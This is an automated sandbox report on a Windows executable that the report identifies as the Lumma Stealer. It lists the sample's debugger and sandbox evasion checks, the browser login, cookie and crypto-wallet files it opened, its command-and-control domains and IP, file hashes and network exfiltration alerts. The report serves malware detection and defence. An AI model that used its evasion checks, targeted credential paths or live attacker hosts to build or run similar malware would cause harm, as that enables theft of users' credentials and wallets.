            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011B8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe System information queried: ModuleInformation
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: regmonclass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: ollydbg
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: filemonclass
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: NTICE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: SICE
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: SIWVID
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: 0_2_0080C72D rdtsc 0_2_0080C72D
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: 0_2_007ED910 LdrInitializeThunk,0_2_007ED910

            HIPS / PFW / Operating System Protection Evasion

            Source: x6VtGfW26X.exe, x6VtGfW26X.exe, 00000000.00000002.1825017053.000000000099D000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: {Program Manager
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Code function: 0_2_007E8040 cpuid 0_2_007E8040
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: x6VtGfW26X.exe, 00000000.00000003.1788826248.00000000059B4000.00000004.00000800.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1788522082.00000000059A7000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %\Windows Defender\MsMpeng.exe
            Source: x6VtGfW26X.exe, 00000000.00000003.1782603529.000000000126D000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000003.1824627069.00000000011D2000.00000004.00000020.00020000.00000000.sdmp, x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match File source: Process Memory Space: x6VtGfW26X.exe PID: 6940, type: MEMORYSTR
            Source: Yara match File source: sslproxydump.pcap, type: PCAP
            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
            Source: x6VtGfW26X.exe, 00000000.00000003.1768827006.000000000124F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
            Source: x6VtGfW26X.exe, 00000000.00000003.1788887914.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: n":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfhp%
            Source: x6VtGfW26X.exe, 00000000.00000002.1825639717.00000000011E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Ethereum
            Source: x6VtGfW26X.exe, 00000000.00000003.1768827006.000000000124F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: x6VtGfW26X.exe, 00000000.00000003.1768756275.000000000125B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
            Source: C:\Users\user\Desktop\x6VtGfW26X.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
            Source: Yara match File source: Process Memory Space: x6VtGfW26X.exe PID: 6940, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: Process Memory Space: x6VtGfW26X.exe PID: 6940, type: MEMORYSTR
            Source: Yara match File source: sslproxydump.pcap, type: PCAP
            Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 1 OS Credential Dumping | 861 Security Software Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 44 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 31 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 113 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 4 Obfuscated Files or Information | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 233 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
| Source | Detection | Scanner | Label |
|---|---|---|---|
| x6VtGfW26X.exe | 58% | Virustotal | |
| x6VtGfW26X.exe | 65% | ReversingLabs | Win32.Trojan.Symmi |
| x6VtGfW26X.exe | 100% | Avira | TR/Crypt.XPACK.Gen |
| x6VtGfW26X.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| fancywaxxers.shop | 100% | Avira URL Cloud | malware |
| https://fancywaxxers.shop/ | 100% | Avira URL Cloud | malware |
| https://fancywaxxers.shop/api | 100% | Avira URL Cloud | malware |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| fancywaxxers.shop | 104.21.112.1 | true | false | | high |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| rabidcowse.shop | false | | high |
| wholersorie.shop | false | | high |
| fancywaxxers.shop | true | Avira URL Cloud: malware | unknown |
| cloudewahsj.shop | false | | high |
| noisycuttej.shop | false | | high |
| nearycrepso.shop | false | | high |
| https://fancywaxxers.shop/api | true | Avira URL Cloud: malware | unknown |
| framekgirus.shop | false | | high |
| tirepublicerj.shop | false | | high |
| abruptyopsn.shop | false | | high |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 104.21.112.1 | fancywaxxers.shop | United States | 13335 | CLOUDFLARENETUS | false |
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1582690
                                                                                      Start date and time:2024-12-31 09:42:06 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 4m 19s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:4
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:x6VtGfW26X.exe
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:c17d20e6be092651357a8b466257b795.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@1/1
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:Failed
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Stop behavior analysis, all processes terminated
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
| Time | Type | Description |
|---|---|---|
| 03:43:02 | API Interceptor | 8x Sleep call for process: x6VtGfW26X.exe modified |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 104.21.112.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | beammp.com/phpmyadmin/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| fancywaxxers.shop | Launcher.exe | malicious | LummaC | 104.21.96.1 |
| | GTA-5-Mod-Menu-2025.exe | malicious | LummaC | 104.21.96.1 |
| | AquaDiscord-2.0.exe | malicious | LummaC | 104.21.16.1 |
| | random.exe | malicious | LummaC | 104.21.48.1 |
| | UmotQ1qjLq.exe | malicious | LummaC | 104.21.96.1 |
| | R3nz_Loader.exe | malicious | LummaC | 104.21.32.1 |
| | Loader.exe | malicious | LummaC | 104.21.80.1 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| CLOUDFLARENETUS | heteronymous.vbs | malicious | Remcos, GuLoader | 172.67.136.42 |
| | re5.mp4.hta | malicious | LummaC | 188.114.96.3 |
| | file.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| | zku4YyCG6L.exe | malicious | Unknown | 188.114.96.3 |
| | hca5qDUYZH.exe | malicious | Unknown | 188.114.96.3 |
| | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 188.114.96.3 |
| | DIS_37745672.pdf | malicious | KnowBe4, PDFPhish | 104.17.247.203 |
| | Poket.mp4.hta | malicious | LummaC | 188.114.97.3 |
| | https://nutricarm.es/wp-templates/f8b83.php | malicious | Unknown | 104.21.96.1 |
| | Exlan_setup_v3.1.2.exe | malicious | LummaC | 172.67.157.254 |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| a0e9f5d64349fb13191bc781f81f42e1 | re5.mp4.hta | malicious | LummaC | 104.21.112.1 |
| | Poket.mp4.hta | malicious | LummaC | 104.21.112.1 |
| | Exlan_setup_v3.1.2.exe | malicious | LummaC | 104.21.112.1 |
| | Set-up.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 104.21.112.1 |
| | Setup.exe | malicious | LummaC | 104.21.112.1 |
| | X-mas_2.3.2.exe | malicious | LummaC | 104.21.112.1 |
| | ReploidReplic.exe | malicious | LummaC | 104.21.112.1 |
| | Bootstrapper.exe | malicious | LummaC | 104.21.112.1 |
| | Launcher.exe | malicious | LummaC | 104.21.112.1 |
| | GTA-5-Mod-Menu-2025.exe | malicious | LummaC | 104.21.112.1 |
                                                                                      No context
                                                                                      No created / dropped files found
                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Entropy (8bit):7.948229887621716
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:x6VtGfW26X.exe
                                                                                      File size:1'883'648 bytes
                                                                                      MD5:c17d20e6be092651357a8b466257b795
                                                                                      SHA1:042cc7fc9e7a36bf4989b6be834b0d0d95557c89
                                                                                      SHA256:c35fd8893480f059a48cabc6fc0a956106f55ec96d3fa728fab1bdb4b57c1705
                                                                                      SHA512:c10a8fce1342439c1beead880d9f8756127ba18061333dc897a28ba40de8a237b75d827f31d02158238f02af69920bb60a9616cfae45d1601e4f10b19a651623
                                                                                      SSDEEP:24576:B/6qQMUF+lvjGV/Afiy3UK8pphCA1WciDk/ZUakSGMvp7WoCM33KgpPKAv9+1ujJ:BCR+R13Uz0ciD2GMvp7WtM3J39BHwM
                                                                                      TLSH:8F9533A04F1AAC6BF4EE227091A3C293F9F7B54065CDD7C4FBD9243096A636838DD509
                                                                                      File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L... .pg..............................J...........@...........................J...........@.................................Y@..m..
                                                                                      Icon Hash:90cececece8e8eb0
                                                                                      Entrypoint:0x8aa000
                                                                                      Entrypoint Section:.taggant
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67701720 [Sat Dec 28 15:20:00 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:6
                                                                                      OS Version Minor:0
                                                                                      File Version Major:6
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:6
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54059 | 0x6d | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x53000 | 0x2b0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x541f8 | 0x8 | .idata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| | 0x1000 | 0x52000 | 0x26000 | 37567f68f3bc0ffaaf1c63c68d2e6a4c | False | 0.9999421772203947 | data | 7.982000691785383 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x53000 | 0x2b0 | 0x400 | fe67bb2a9df3150b9c94de8bd81ed8a0 | False | 0.3603515625 | data | 5.186832724894366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0x54000 | 0x1000 | 0x200 | 39a711a7d804ccbc2a14eea65cf3c27e | False | 0.154296875 | data | 1.0789976601211375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| | 0x55000 | 0x2b2000 | 0x200 | e9d4dd75a481b2e6368f0d5de2f68d49 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| yojtimdr | 0x307000 | 0x1a2000 | 0x1a2000 | 5f24d958da66408207fdf4cefeef98bd | False | 0.994666870701256 | data | 7.953909419587561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| yoycphiu | 0x4a9000 | 0x1000 | 0x400 | b2d1ec042ef1c349bb0a40fd3dcce56d | False | 0.75 | data | 5.863831487470667 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .taggant | 0x4aa000 | 0x3000 | 0x2200 | 509b693722c977bac204bd1b5623fd43 | False | 0.09880514705882353 | DOS executable (COM) | 1.1088013999111535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x53058 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535 |

| DLL | Import |
|---|---|
| kernel32.dll | lstrcpy |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-12-31T09:43:02.129169+0100 | 2058656 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop) | 1 | 192.168.2.4 | 50288 | 1.1.1.1 | 53 | UDP |
| 2024-12-31T09:43:02.644820+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:02.644820+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:03.125539+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:03.125539+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49730 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:03.623054+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:03.623054+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:04.093969+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:04.093969+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.4 | 49731 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:04.830639+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49732 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:04.830639+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49732 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:06.073842+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49733 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:06.073842+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49733 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:07.598382+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49734 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:07.598382+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49734 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:09.153886+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:09.153886+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:09.582681+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.4 | 49735 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:10.488984+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49736 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:10.488984+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49736 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:14.085649+0100 | 2058657 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) | 1 | 192.168.2.4 | 49737 | 104.21.112.1 | 443 | TCP |
| 2024-12-31T09:43:14.085649+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49737 | 104.21.112.1 | 443 | TCP |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Dec 31, 2024 09:43:08.216042042 CET44349734104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.622359991 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.622421026 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:08.622486115 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.623651981 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:08.623668909 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.153768063 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.153886080 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.155348063 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.155359030 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.155587912 CET44349735104.21.112.1192.168.2.4
                                                                                      Dec 31, 2024 09:43:09.161539078 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.161652088 CET49735443192.168.2.4104.21.112.1
                                                                                      Dec 31, 2024 09:43:09.161658049 CET44349735104.21.112.1192.168.2.4
